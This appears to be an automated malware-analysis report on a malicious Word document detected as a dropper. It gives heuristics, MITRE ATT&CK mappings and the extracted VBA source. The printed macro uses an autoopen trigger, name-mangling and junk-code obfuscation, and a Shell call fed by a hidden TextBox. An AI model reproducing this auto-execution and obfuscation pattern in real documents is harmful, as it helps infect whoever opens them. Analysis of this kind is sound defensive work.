MALICIOUS
Risk Score: 252
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The 'autoopen' macro is present and uses the Shell() function, indicating an attempt to execute external commands. This strongly suggests downloader or dropper functionality, where the macro's primary purpose is to fetch and execute a secondary payload. The ClamAV detection 'Doc.Dropper.Valyria-6786418-0' further supports this assessment.
Heuristics (9)
- ClamAV: Doc.Dropper.Valyria-6786418-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Dropper.Valyria-6786418-0
- VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]: Document contains VBA macro code
- Potential Shell call in VBA [critical, OLE_VBA_SHELL]: Potential Shell call in VBA. Matched lines in script:
  Set GomFBhFEZAjciYcbvAZ = rrjnfISWnaKsnvADt
  mCMisjiv = Array(IKziGn, ZOHrzJFD, rVjcnbFYO, Interaction.Shell(tOQlqS, ZJEskE), PqJIaRi)
  Select Case wTmIZNajhowpbznOjabtpA
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro [low, OLE_VBA_AUTOOPEN]: AutoOpen macro. Matched lines in script:
  Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
  Sub autoopen()
  ofzbwn
- Suspicious cmd.exe invocation with execution flag [high, SC_STR_CMD]
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact [info, EXTRACTED_FILE_STATIC_TRIAGE]: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9291 bytes |

SHA-256: 7b637f4f4b84f5f1c11e5ca08a276ba22fdd4f8649a62c785053e293a220e6ab

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. 253 of 291 identifiers look randomly generated (e.g. 'TcsKkqPPidaTcBHdPicalNDV'), consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ackNspllSXjs"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
ofzbwn
End Sub
Attribute VB_Name = "kaMjEnZEv"
Function ofzbwn()
On Error Resume Next
Select Case vKDtPmLmWHbZCCJrLj
Case 72333624
iYiXcWRTcdDzRlaPwdw = wRSlkGCErGFZvpsXc
QsVsJsEdHQctuintiNFw = Log(WUMbWYdCctDnQMDvDIajGw)
czLWmBKiSfstYJQnUbafX = 164624586
iWjzbFfQjYijdKB = BSOkIXSimmUGFfTNDshACDj
Case 168852348
OMVpZmcSkZMJowGDELokYK = 4145504
UfldAozjoztLzoM = Log(snVGGEPvbzzsupODLQVtBzSv)
dUrDuFQworlpuwQQqBC = 281920098
oziqAjTTwtUZdcj = Log(sjshtFzcORSFdKzQEWo)
End Select
Set IMuZwfpwRQQVjrwVKJ = iCFbiNOqovEUHoOQ
Select Case cTwZwiuOuaGCZPv
Case 335124346
rQGJstNXNnPHHd = skYiOWMwXNZIkWYDHvbqzjvk
kCjviGnzLJprMkjiRiv = Log(kcAokIMfmvJonIdUd)
sHmLZMjMuKvMhA = 339800782
qIBuLWtHKPzADEHLA = qojZDoFXNBkaNJpVS
Case 139478589
jsWNiAJMjIpCjLTKLl = 110506701
MonIrXjCqLimms = Log(WTaCYtbWPXwAPuzdk)
QGuFNWHRHWYaDQ = 283969453
zqljsLlSYksWUHqhzlVmWRF = Log(uHmFwoUiJVwIsB)
End Select
Set FVcjddlwzfqcRuF = jkjolYjTjPKMzKhowc
Select Case clmPIkOzcFjNJQVURFhzt
Case 226201973
azvQvuoZwkuLrJrzuLoiGqzN = fZsWCHptoMPMTSDnfkdPEiL
HmlFDqjAiZQUvDtcESD = Log(blaslqbGWwmAOSOQVkpzdPdu)
jsbqAKmbOzWLtT = 88893107
cdkmPFdodHTcFTMIj = CwzQWnAZAUsEcRciBltInd
Case 97622983
NtrJVvlNfCRPPMHwlpFIwY = 202011127
AWSaOXDYjMCdwq = Log(FjiZZzNTodwXzY)
roOoJwcLwHzsfCJ = 203083792
ulAZRzFCnDdwSA = Log(AdVOOHhGcYfRZGh)
End Select
Set fwvcMYhZoJlWuzOjH = sChuQtNiYAlhfwFnwzXXscv
Select Case LcOHSbfuDbtqadw
Case 158182988
PXcNNEpBjdHqDnBnbqnsfCjt = QUzvwWjCIwrsuzY
FjzXDznsCznLfRMojFz = Log(sGmHYovpJvhsPTZTlVEQj)
tziXWqmDIoAnjzw = 279504140
PEwiHSvwMrsCNBjEnMoYARED = msrbnaWvWpMiWlf
Case 260528447
KztAunUjsmISzzzvcVZ = 23713361
ZRWHrMTWRbIkZHFJFr = Log(XsunOdZrMmtQGjH)
hWtDbANaKzhYqulWdUjbi = 197183736
dRVGjXLCASWXmMn = Log(WfUcPvAASBXmlDfFDPPl)
End Select
Set tdCzwjGUXwKprJw = BshRUoiAZRzmQTXw
Const ZJEskE = 0
Select Case hlYFOCofacrbzIYNn
Case 12081616
zPzzKQPzGjPilazGjIpi = kmzLCEnUzpRTmDzknN
zFizKuFBABpEzXJMcAmILb = Log(HqwOzWAWvvziPCnmQwCn)
JkTwdrWkBEdXbaIMjG = 204659795
itJzstJpNVLJoKzFiSVfdmuq = GobiZjqXnoQbWDkhjW
Case 208094654
UjRdCiOkzVszTblFiLomVmB = 145855366
iIOlwzQOwCXWwbrVFXRvR = Log(uSiwVhtXiivwYaz)
BYckWZNjkkzQQOjaQWNwGzci = 139406412
TpaCCRWFVsSjlVEvOlk = Log(HTwUfCMCtCwuPzFYIhhf)
End Select
Set KsrHjkrsKkqzrRzrFWAETMT = YRoQfnjEFjzbGNwRVKiSFzXj
Select Case NpLTlXWfviCZjZlrhiHWFhdj
Case 157892767
DqPtKXwpkDFzmjkttmLNw = cHmsRrqfLcvEUfQBTiduoi
hramMorYKjNOHHSGFwErdE = Log(MEcrSjjDBtVEArFirTDkV)
RItAYYwkqJdJNhj = 321434677
sbfMUlCSPzUNYZTMFnU = RHKHQCLbqdYuuuLIpuwXriJY
Case 184599046
SjJzItPzHlQYvRZbcl = 182175315
SiOKXKqwGjwmftkcRtV = Log(fvnasRzfzPGXzCEnVzZz)
SsXmitBjzKiQzu = 152670997
oSGLLzrdaocpzGRTXbMCPnN = Log(zwzEXGzHhwjhTmrSBuM)
End Select
Set QMjqsPtViUcBEiNMAmFTpU = BZkzljtBUaXHlPI
Select Case hXMjhrDsGrktMEvKvhbo
Case 293378800
pAJAWABuhOjctJOwQzWEzT = BVqMCRXzzmuhLXjV
qLKWNjLlwzQbRo = Log(WpHfjnwcJPjqwcCYkiTNnI)
omiaGSHXfwHKWPAoPrjBHi = 293489342
JtbfzwazOBTtBMsK = rDsrRjIjpDVEHj
Case 66706650
SRNrbahXHwUwHnDzZzPaAUr = 86672704
vHuEvGUJzjvfTaRWV = Log(ULLcCAWfIQjtzZzYfSmSL)
znHEHUFYwEfkXBHTFuiQwE = 170671336
lVfvuwjCZiLYVws = Log(ZjRiOMCwRMNsju)
End Select
Set vNASmoKdAUcLspizHBjrPmv = YShdikrSinQLVfFNOFRJlBK
tOQlqS = ackNspllSXjs.TextBox1 + tUHjv + GrDDbI + JhEZXbb + cKVlGX + vTiAOa + nivlb + BjbUF + tNmlG + jBWMilck
Select Case bjipRsZoFDKQhriTkW
Case 88995193
ZEoukQwPGFTvViMUrWKHk = wGBdVwdiwEMmzXrkEBw
hAkOuCiJbOMFzBHi = Log(HuzmbGOjjhpdHRILZqvVniT)
UDjsGmvPJszHwYGuW = 205283633
VpfUwDtZKMMFYbhS = XWczlZTPUBPBkBzHXwc
Case 265489337
moMMkDwmZfPGhWzCNjPLE = 189082055
iYaKNzAdEdpkiP = Log(AVWcvVzuCiAFKONciKmin)
tjpYCKcsmRmcitoc = 220908180
idXfNrqOrBLawhwqcmnW = Log(oSKsiShjTnCcGDKnNW)
End Select
Set hnTbhLVFfsQBoKMqLMniZJiX = JwpimDPQqpfVqdjN
Select Case SoPDXiioOdENXLjtsfwLvUq
Case 128223372
TLGhSKQQljiQXqkQEtqhSqV = havQrwwwwLETXHvSnwmcBdUo
urbzladpKAsPzZml = Log(TMmRtwzXuVDtuDGGEzHW)
KkadMHDDnXArWJHCuBudbrFZ = 318543185
wlJubfOjJcLnjpuUG = DBXuwEKwMtXTfAhwKRtsvVdq
Case 342030967
qHUEjGkHWusBmFkfSUIp = 325625307
FjicbNCiYhuTODbH = Log(RiXdmEJioIQCJhJh)
BkaGfXFoWKHSqhDLJqHa = 217533452
fVzmFlfPzkmjCqhElL = Log(pQtBLzaMrzrCHwhFE)
End Select
Set tRTJHKWjHfNdFEv = rCmTmoiZnPIiflU
Select Case TKsBwlYRIwwRDYknzS
Case 13396384
wppZCHJSERcwko = PfukfiOEORPURBljwSZYdUSz
bFNrVzhPbVHCiWXjlbInms = Log(ShijLPUuNvuEYBNsR)
FqfdjQwBprtJLDjouJrTW = 340075020
buGnRziXjqFjBlp = NjJacBEkrUkGEA
Case 329930767
FjEjZciCHTJTGWhC = 37696873
djMZiZqWvwPbTis = Log(aRhFblFHSIrkdVnhAvWOzjF)
tDhhmfzaaMvPVAjsiEGV = 221603626
sZJhbXMiuuMCMYD = Log(UmIRKRaXMAPdjuZkzo)
End Select
Set HXFEcOwSADTnIpHj = MQvbzmUaIiuzVbEXNw
Select Case DVBUjmwlowSdwUVSEfqqt
Case 176762108
TcsKkqPPidaTcBHdPicalNDV = XBVsatqcXhrqbNuYjnzW
tRwBbMRAMGZXiM = Log(tWDkjqETQnnQhBEaEzfijZ)
zjZbLbSTzAFfKjOnKpwjOnv = 233771448
HfVXziGUjEDJPsszTqQbWuqp = UolscMlqcDvzvwSz
Case 69651768
fKdvwFiuwfHdMpfLitVb = 25318290
STmowAXszcLQKiiZsfJhPGi = Log(rGRkTYiiansKIHIiXDhfRviB)
EBpSWcLknzqjnYZwdqWl = 158975002
kWbKLYDhvbPHPXoQD = Log(jaUJSzjfIjoEHPEn)
End Select
Set TrMQnjFCPTfJBJMnL = zwaEbajQWtqTzD
Select Case KASYWowlRGJFKXkC
Case 315556982
MboLinVjACIWNTP = MJtnYijvciiqFnUiXuk
WwRiCqotdvtqqlLaJIihvsi = Log(JfbNidwTiUCNrPkiqmSjonzT)
tVOLCzdQRUWObLzzaHV = 234294349
jtYArIaBLVjIlpIkIjVYwZuN = OaTjOjijdKcqKLqDOG
Case 337771710
FqWrMSbALBJwKjchHRwpBZH = 204247076
uzUiUiSvXOYEbWwEiYbA = Log(fijIwwKJojirLSUGVqTq)
nRDdfuAkXAjiCO = 126095082
WYlIliiqNQDbwIhIKZsMf = Log(QBJZRfCMJEBVzSihSEjN)
End Select
Set PqZmOTXUcWGFqHjzM = CnAHzZcJPZcHndSPB
Select Case LlwuuVIPZECzhsX
Case 289870747
ktINjaMzSPrdrjJFjbla = jQtEbkpzalANvimZsbLlvb
QliUsuzRlRpEcOJ = Log(pXzsirQvEXjrzao)
ELcStPwFcTOvFaJLiUVOvja = 168390696
mPVNGSLcwzRlrNabtP = cUpiOVIiEazUlDzH
Case 339399237
sWBDTJasZrGvnCUOwBw = 244063328
sznGCwifitGaABt = Log(ZAjEWwRYJnuAWGwK)
UzYOwQKvMqzzUnBaF = 152613656
QjjwjOzPDdJbzv = Log(fBUvdjVIKFTZpzta)
End Select
Set jwuhkDrzwBHRCOzDH = AGJtQuXZrNpIPKD
Select Case mIwBzPwMsiqTcLQKalchj
Case 66512996
MLOfEGvrdnhZwwT = fjjYImWvGAQzrdlzcDm
lksGznNfumSNGJwwAlzZoT = Log(DqwAACizvKdqvrcbVZq)
UhCshjnzqGMBSL = 267046734
BmMdLpWCdTAHXKbAz = EWnDTTPjGpwbYkCMZ
Case 225629749
NpfKAOOjjbfiLDzG = 121429794
zTtObihDBuQELktokdZL = Log(pFniIaLnXZdjicOTwNwdwN)
PbQvkXTVhHqIOGfTHW = 109663275
VnUcIfVlQchqblXHrfaQ = Log(DvcsUAMTtpHfjw)
End Select
Set GomFBhFEZAjciYcbvAZ = rrjnfISWnaKsnvADt
mCMisjiv = Array(IKziGn, ZOHrzJFD, rVjcnbFYO, Interaction.Shell(tOQlqS, ZJEskE), PqJIaRi)
Select Case wTmIZNajhowpbznOjabtpA
Case 70667404
iaIDJSBUmLHsLEKls = YKfCHSLorMvEzvIUZw
XWPmdDPsuDcPqBV = Log(zljTprUboYhOLkqiLfU)
JYCwraRlOzFDbUIjtiPfBnzE = 145842006
hKNzDKjZRbjhcP = jNrTinqbHkhPpuWbzcq
Case 295235919
XQtuWCCjzMCAFSZ = 37900643
rNqjGNWvrivAlElWTLwwZ = Log(kouHYfPjcwVMkcC)
RDWzfYHjNHQilGdHLj = 188816715
owprjHBwfZTIUw = Log(sbabMjOtQOkwWTNBBAziTOf)
End Select
Set YWJBonHKoMkjkHPWaE = cvIffRXSIUOaivHDqXN
Select Case vShdHQSLkUzzaTbHcuMt
Case 103694278
tKICpPmhGtVplGHnzQHJ = iwXXBIYSfzLOPYXU
bDZDNGikhVzpvw = Log(GUKLlfnGOObtKbWhkSuoDj)
VstmUnZdkCYHuNM = 231198183
ozLomMTJLnPWAHjWLpT = tTTolrrmTcTXjVAGYTifZcJ
Case 341926888
GjvpkiXtrfUdWDuV = 220552214
jTrmfGdwsGnRQJTiiIvwit = Log(ispjcBPoKsnajSTDoLmqRFZP)
KrZmZkGpXNupaAwc = 121497679
ZdjmMKEHkwCiYSaVRKqC = Log(HjkJFYNOKpOwcAmbXfOhS)
End Select
Set KnsocPFjmlQtRzzdGlqsZGoj = SottfbUSIVzQQwwJbDcijipb
End Function